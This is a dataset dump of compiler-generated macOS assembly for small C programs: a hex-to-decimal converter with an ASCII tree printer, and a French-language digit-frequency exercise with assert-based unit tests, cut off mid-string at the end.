"\320\236\320\261\321\212\320\265\320\274 = %.5f\n\320\242\320\265\320\274\320\277\320\265\321\200\320\260\321\202\321\203\321\200\320\260 = %.5f" .subsections_via_symbols
the_stack_data/76884.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _hexToDec ; -- Begin function hexToDec .p2align 2 _hexToDec: ; @hexToDec .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur x0, [x29, #-40] adrp x8, l___const.hexToDec.hValues@PAGE add x8, x8, l___const.hexToDec.hValues@PAGEOFF ldr q0, [x8] stur q0, [x29, #-32] stur wzr, [x29, #-44] str wzr, [sp, #48] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ldrsw x8, [sp, #48] str x8, [sp, #24] ; 8-byte Folded Spill ldur x0, [x29, #-40] bl _strlen ldr x8, [sp, #24] ; 8-byte Folded Reload subs x8, x8, x0 cset w8, hs tbnz w8, #0, LBB0_10 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur x0, [x29, #-40] bl _strlen subs x8, x0, #1 ldrsw x9, [sp, #48] subs x8, x8, x9 ; kill: def $w8 killed $w8 killed $x8 str w8, [sp, #36] str wzr, [sp, #32] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #32] subs w8, w8, #16 cset w8, ge tbnz w8, #0, LBB0_8 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 ldur x8, [x29, #-40] ldrsw x9, [sp, #48] ldrsb w8, [x8, x9] ldrsw x10, [sp, #32] sub x9, x29, #32 ldrsb w9, [x9, x10] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldur s1, [x29, #-44] ; implicit-def: $d0 fmov s0, s1 sshll.2d v0, v0, #0 ; kill: def $d0 killed $d0 killed $q0 scvtf d0, d0 str d0, [sp, #8] ; 8-byte Folded Spill ldr s1, [sp, #32] ; implicit-def: $d0 fmov s0, s1 sshll.2d v0, v0, #0 ; kill: def $d0 killed $d0 killed $q0 scvtf d0, d0 str d0, [sp, #16] ; 8-byte Folded Spill ldr s1, [sp, #36] ; implicit-def: $d0 fmov s0, s1 sshll.2d v0, v0, #0 ; kill: def $d0 killed $d0 killed $q0 scvtf d1, d0 fmov d0, #16.00000000 bl _pow ldr d2, [sp, #8] ; 8-byte Folded Reload fmov d1, d0 ldr d0, [sp, #16] ; 8-byte Folded Reload fmadd d0, d0, d1, d2 fcvtzs w8, d0 stur w8, [x29, #-44] b LBB0_8 LBB0_6: ; in Loop: Header=BB0_3 Depth=2 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_3 Depth=2 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB0_3 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #48] add w8, w8, #1 str w8, [sp, #48] b LBB0_1 LBB0_10: ldur w8, [x29, #-44] str w8, [sp, #4] ; 4-byte Folded Spill ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_12 b LBB0_11 LBB0_11: bl ___stack_chk_fail LBB0_12: ldr w0, [sp, #4] ; 4-byte Folded Reload ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .globl _outputCharIteration ; -- Begin function outputCharIteration .p2align 2 _outputCharIteration: ; @outputCharIteration .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 sturb w0, [x29, #-1] stur w1, [x29, #-8] stur wzr, [x29, #-12] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldursb w10, [x29, #-1] mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB1_1 LBB1_4: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _outputUpperTree ; -- Begin function outputUpperTree .p2align 2 _outputUpperTree: ; @outputUpperTree .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str wzr, [sp, #8] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #8] ldur w9, [x29, #-4] mov w10, #2 sdiv w9, w9, w10 add w9, w9, #1 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_4 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldur w8, [x29, #-4] mov w9, #2 sdiv w8, w8, w9 ldr w9, [sp, #8] subs w1, w8, w9 mov w0, #32 bl _outputCharIteration ldr w8, [sp, #8] lsl w8, w8, #1 add w1, w8, #1 mov w0, #42 bl _outputCharIteration adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB2_1 LBB2_4: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _outputLowerTree ; -- Begin function outputLowerTree .p2align 2 _outputLowerTree: ; @outputLowerTree .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str w1, [sp, #8] str wzr, [sp, #4] b LBB3_1 LBB3_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #4] ldr w9, [sp, #8] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB3_4 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 ldur w8, [x29, #-4] mov w9, #2 sdiv w8, w8, w9 subs w1, w8, #1 mov w0, #32 bl _outputCharIteration mov w0, #42 mov w1, #3 bl _outputCharIteration adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB3_3 LBB3_3: ; in Loop: Header=BB3_1 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB3_1 LBB3_4: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _printTree ; -- Begin function printTree .p2align 2 _printTree: ; @printTree .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str w1, [sp, #8] ldur w0, [x29, #-4] bl _outputUpperTree ldur w0, [x29, #-4] ldr w1, [sp, #8] bl _outputLowerTree ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 stur w8, [x29, #-12] ; 4-byte Folded Spill stur wzr, [x29, #-4] adrp x8, l___const.main.hex@PAGE add x8, x8, l___const.main.hex@PAGEOFF ldr w8, [x8] sub x0, x29, #8 str x0, [sp, #24] ; 8-byte Folded Spill stur w8, [x29, #-8] bl _hexToDec ldr x8, [sp, #24] ; 8-byte Folded Reload mov x9, sp str x8, [x9] ; implicit-def: $x8 mov x8, x0 str x8, [x9, #8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf mov w0, #10 mov w1, #3 stur w1, [x29, #-16] ; 4-byte Folded Spill bl _printTree ldur w1, [x29, #-16] ; 4-byte Folded Reload mov w0, #30 bl _printTree ldur w1, [x29, #-16] ; 4-byte Folded Reload mov w0, #50 bl _printTree ldur w0, [x29, #-12] ; 4-byte Folded Reload ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__literal16,16byte_literals l___const.hexToDec.hValues: ; @__const.hexToDec.hValues .ascii "0123456789ABCDEF" .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%c" l_.str.1: ; @.str.1 .asciz "\n" l___const.main.hex: ; @__const.main.hex .asciz "FF3" l_.str.2: ; @.str.2 .asciz "The hex value %s is %d in decimal\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function hexToDec LCPI0_0: .quad 0x4030000000000000 ## double 16 .section __TEXT,__text,regular,pure_instructions .globl _hexToDec .p2align 4, 0x90 _hexToDec: ## @hexToDec .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -40(%rbp) movq L___const.hexToDec.hValues(%rip), %rax movq %rax, -32(%rbp) movq L___const.hexToDec.hValues+8(%rip), %rax movq %rax, -24(%rbp) movl $0, -44(%rbp) movl $0, -48(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 movslq -48(%rbp), %rax movq %rax, -72(%rbp) ## 8-byte Spill movq -40(%rbp), %rdi callq _strlen movq %rax, %rcx movq -72(%rbp), %rax ## 8-byte Reload cmpq %rcx, %rax jae LBB0_10 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -40(%rbp), %rdi callq _strlen subq $1, %rax movslq -48(%rbp), %rcx subq %rcx, %rax ## kill: def $eax killed $eax killed $rax movl %eax, -60(%rbp) movl $0, -64(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $16, -64(%rbp) jge LBB0_8 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 movq -40(%rbp), %rax movslq -48(%rbp), %rcx movsbl (%rax,%rcx), %eax movslq -64(%rbp), %rcx movsbl -32(%rbp,%rcx), %ecx cmpl %ecx, %eax jne LBB0_6 ## %bb.5: ## in Loop: Header=BB0_1 Depth=1 cvtsi2sdl -44(%rbp), %xmm0 movsd %xmm0, -88(%rbp) ## 8-byte Spill cvtsi2sdl -64(%rbp), %xmm0 movsd %xmm0, -80(%rbp) ## 8-byte Spill cvtsi2sdl -60(%rbp), %xmm1 movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero callq _pow movsd -88(%rbp), %xmm1 ## 8-byte Reload ## xmm1 = mem[0],zero movaps %xmm0, %xmm2 movsd -80(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 cvttsd2si %xmm0, %eax movl %eax, -44(%rbp) jmp LBB0_8 LBB0_6: ## in Loop: Header=BB0_3 Depth=2 jmp LBB0_7 LBB0_7: ## in Loop: Header=BB0_3 Depth=2 movl -64(%rbp), %eax addl $1, %eax movl %eax, -64(%rbp) jmp LBB0_3 LBB0_8: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_9 LBB0_9: ## in Loop: Header=BB0_1 Depth=1 movl -48(%rbp), %eax addl $1, %eax movl %eax, -48(%rbp) jmp LBB0_1 LBB0_10: movl -44(%rbp), %eax movl %eax, -92(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_12 ## %bb.11: movl -92(%rbp), %eax ## 4-byte Reload addq $96, %rsp popq %rbp retq LBB0_12: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _outputCharIteration ## -- Begin function outputCharIteration .p2align 4, 0x90 _outputCharIteration: ## @outputCharIteration .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movb %dil, %al movb %al, -1(%rbp) movl %esi, -8(%rbp) movl $0, -12(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %eax cmpl -8(%rbp), %eax jge LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movsbl -1(%rbp), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB1_1 LBB1_4: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _outputUpperTree ## -- Begin function outputUpperTree .p2align 4, 0x90 _outputUpperTree: ## @outputUpperTree .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl $0, -8(%rbp) LBB2_1: ## =>This Inner Loop Header: Depth=1 movl -8(%rbp), %eax movl %eax, -12(%rbp) ## 4-byte Spill movl -4(%rbp), %eax movl $2, %ecx cltd idivl %ecx movl %eax, %ecx movl -12(%rbp), %eax ## 4-byte Reload addl $1, %ecx cmpl %ecx, %eax jge LBB2_4 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movl -4(%rbp), %eax movl $2, %ecx cltd idivl %ecx movl %eax, %esi subl -8(%rbp), %esi movl $32, %edi callq _outputCharIteration movl -8(%rbp), %esi shll $1, %esi addl $1, %esi movl $42, %edi callq _outputCharIteration leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB2_1 Depth=1 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB2_1 LBB2_4: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _outputLowerTree ## -- Begin function outputLowerTree .p2align 4, 0x90 _outputLowerTree: ## @outputLowerTree .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movl $0, -12(%rbp) LBB3_1: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %eax cmpl -8(%rbp), %eax jge LBB3_4 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movl -4(%rbp), %eax movl $2, %ecx cltd idivl %ecx movl %eax, %esi subl $1, %esi movl $32, %edi callq _outputCharIteration movl $42, %edi movl $3, %esi callq _outputCharIteration leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB3_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB3_1 LBB3_4: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _printTree ## -- Begin function printTree .p2align 4, 0x90 _printTree: ## @printTree .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movl -4(%rbp), %edi callq _outputUpperTree movl -4(%rbp), %edi movl -8(%rbp), %esi callq _outputLowerTree addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl L___const.main.hex(%rip), %eax movl %eax, -8(%rbp) leaq -8(%rbp), %rax movq %rax, -16(%rbp) ## 8-byte Spill leaq -8(%rbp), %rdi callq _hexToDec movq -16(%rbp), %rsi ## 8-byte Reload movl %eax, %edx leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl $10, %edi movl $3, %esi callq _printTree movl $30, %edi movl $3, %esi callq _printTree movl $50, %edi movl $3, %esi callq _printTree xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal16,16byte_literals .p2align 4 ## @__const.hexToDec.hValues L___const.hexToDec.hValues: .ascii "0123456789ABCDEF" .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%c" L_.str.1: ## @.str.1 .asciz "\n" L___const.main.hex: ## @__const.main.hex .asciz "FF3" L_.str.2: ## @.str.2 .asciz "The hex value %s is %d in decimal\n" .subsections_via_symbols
the_stack_data/138173.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _frequence ; -- Begin function frequence .p2align 2 _frequence: ; @frequence .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str w1, [sp, #8] ldr w8, [sp, #8] subs w8, w8, #0 cset w9, lt ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: adrp x0, l___func__.frequence@PAGE add x0, x0, l___func__.frequence@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #18 adrp x3, l_.str.1@PAGE add x3, x3, l_.str.1@PAGEOFF bl ___assert_rtn LBB0_2: b LBB0_3 LBB0_3: ldr w8, [sp, #8] subs w8, w8, #9 cset w9, gt ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: adrp x0, l___func__.frequence@PAGE add x0, x0, l___func__.frequence@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #19 adrp x3, l_.str.2@PAGE add x3, x3, l_.str.2@PAGEOFF bl ___assert_rtn LBB0_5: b LBB0_6 LBB0_6: mov w0, #-1 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _test_frequence ; -- Begin function test_frequence .p2align 2 _test_frequence: ; @test_frequence .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w0, #1515 mov w1, #5 bl _frequence mov w8, #2 subs w8, w8, w0 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: adrp x0, l___func__.test_frequence@PAGE add x0, x0, l___func__.test_frequence@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #34 adrp x3, l_.str.3@PAGE add x3, x3, l_.str.3@PAGEOFF bl ___assert_rtn LBB1_2: b LBB1_3 LBB1_3: mov w0, #123 mov w1, #3 bl _frequence mov w8, #1 subs w8, w8, w0 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB1_5 b LBB1_4 LBB1_4: adrp x0, l___func__.test_frequence@PAGE add x0, x0, l___func__.test_frequence@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #35 adrp x3, l_.str.4@PAGE add x3, x3, l_.str.4@PAGEOFF bl ___assert_rtn LBB1_5: b LBB1_6 LBB1_6: mov w0, #421 mov w1, #0 stur w1, [x29, #-4] ; 4-byte Folded Spill bl _frequence ldur w8, [x29, #-4] ; 4-byte Folded Reload subs w8, w8, w0 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB1_8 b LBB1_7 LBB1_7: adrp x0, l___func__.test_frequence@PAGE add x0, x0, l___func__.test_frequence@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #36 adrp x3, l_.str.5@PAGE add x3, x3, l_.str.5@PAGEOFF bl ___assert_rtn LBB1_8: b LBB1_9 LBB1_9: mov w0, #444 mov w1, #4 bl _frequence mov w8, #3 subs w8, w8, w0 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB1_11 b LBB1_10 LBB1_10: adrp x0, l___func__.test_frequence@PAGE add x0, x0, l___func__.test_frequence@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #37 adrp x3, l_.str.6@PAGE add x3, x3, l_.str.6@PAGEOFF bl ___assert_rtn LBB1_11: b LBB1_12 LBB1_12: mov w1, #0 mov x0, x1 bl _frequence mov w8, #1 subs w8, w8, w0 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB1_14 b LBB1_13 LBB1_13: adrp x0, l___func__.test_frequence@PAGE add x0, x0, l___func__.test_frequence@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #38 adrp x3, l_.str.7@PAGE add x3, x3, l_.str.7@PAGEOFF bl ___assert_rtn LBB1_14: b LBB1_15 LBB1_15: mov x9, sp adrp x8, l_.str.9@PAGE add x8, x8, l_.str.9@PAGEOFF str x8, [x9] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _printf ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #8] ; 4-byte Folded Spill stur wzr, [x29, #-4] bl _test_frequence mov x9, sp adrp x8, l_.str.10@PAGE add x8, x8, l_.str.10@PAGEOFF str x8, [x9] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _printf ldr w0, [sp, #8] ; 4-byte Folded Reload ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l___func__.frequence: ; @__func__.frequence .asciz "frequence" l_.str: ; @.str .asciz "234517832.c" l_.str.1: ; @.str.1 .asciz "chiffre >= 0" l_.str.2: ; @.str.2 .asciz "chiffre <= 9" l___func__.test_frequence: ; @__func__.test_frequence .asciz "test_frequence" l_.str.3: ; @.str.3 .asciz "2 == frequence(1515, 5)" l_.str.4: ; @.str.4 .asciz "1 == frequence(123, 3)" l_.str.5: ; @.str.5 .asciz "0 == frequence(421, 0)" l_.str.6: ; @.str.6 .asciz "3 == frequence(444, 4)" l_.str.7: ; @.str.7 .asciz "1 == frequence(0, 0)" l_.str.8: ; @.str.8 .asciz "%s" l_.str.9: ; @.str.9 .asciz "frequence... ok\n" l_.str.10: ; @.str.10 .asciz "Bravo ! Tous les tests passent.\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _frequence ## -- Begin function frequence .p2align 4, 0x90 _frequence: ## @frequence .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl %esi, -8(%rbp) cmpl $0, -8(%rbp) setge %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB0_2 ## %bb.1: leaq L___func__.frequence(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.1(%rip), %rcx movl $18, %edx callq ___assert_rtn LBB0_2: jmp LBB0_3 LBB0_3: cmpl $9, -8(%rbp) setle %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB0_5 ## %bb.4: leaq L___func__.frequence(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.2(%rip), %rcx movl $19, %edx callq ___assert_rtn LBB0_5: jmp LBB0_6 LBB0_6: movl $4294967295, %eax ## imm = 0xFFFFFFFF addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _test_frequence ## -- Begin function test_frequence .p2align 4, 0x90 _test_frequence: ## @test_frequence .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $1515, %edi ## imm = 0x5EB movl $5, %esi callq _frequence movl %eax, %ecx movl $2, %eax cmpl %ecx, %eax sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB1_2 ## %bb.1: leaq L___func__.test_frequence(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.3(%rip), %rcx movl $34, %edx callq ___assert_rtn LBB1_2: jmp LBB1_3 LBB1_3: movl $123, %edi movl $3, %esi callq _frequence movl %eax, %ecx movl $1, %eax cmpl %ecx, %eax sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB1_5 ## %bb.4: leaq L___func__.test_frequence(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.4(%rip), %rcx movl $35, %edx callq ___assert_rtn LBB1_5: jmp LBB1_6 LBB1_6: movl $421, %edi ## imm = 0x1A5 xorl %esi, %esi callq _frequence movl %eax, %ecx xorl %eax, %eax cmpl %ecx, %eax sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB1_8 ## %bb.7: leaq L___func__.test_frequence(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.5(%rip), %rcx movl $36, %edx callq ___assert_rtn LBB1_8: jmp LBB1_9 LBB1_9: movl $444, %edi ## imm = 0x1BC movl $4, %esi callq _frequence movl %eax, %ecx movl $3, %eax cmpl %ecx, %eax sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB1_11 ## %bb.10: leaq L___func__.test_frequence(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.6(%rip), %rcx movl $37, %edx callq ___assert_rtn LBB1_11: jmp LBB1_12 LBB1_12: xorl %esi, %esi movl %esi, %edi callq _frequence movl %eax, %ecx movl $1, %eax cmpl %ecx, %eax sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB1_14 ## %bb.13: leaq L___func__.test_frequence(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.7(%rip), %rcx movl $38, %edx callq ___assert_rtn LBB1_14: jmp LBB1_15 LBB1_15: leaq L_.str.8(%rip), %rdi leaq L_.str.9(%rip), %rsi movb $0, %al callq _printf popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) callq _test_frequence leaq L_.str.8(%rip), %rdi leaq L_.str.10(%rip), %rsi movb $0, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L___func__.frequence: ## @__func__.frequence .asciz "frequence" L_.str: ## @.str .asciz "234517832.c" L_.str.1: ## @.str.1 .asciz "chiffre >= 0" L_.str.2: ## @.str.2 .asciz "chiffre <= 9" L___func__.test_frequence: ## @__func__.test_frequence .asciz "test_frequence" L_.str.3: ## @.str.3 .asciz "2 == frequence(1515, 5)" L_.str.4: ## @.str.4 .asciz "1 == frequence(123, 3)" L_.str.5: ## @.str.5 .asciz "0 == frequence(421, 0)" L_.str.6: ## @.str.6 .asciz "3 == frequence(444, 4)" L_.str.7: ## @.str.7 .asciz "1 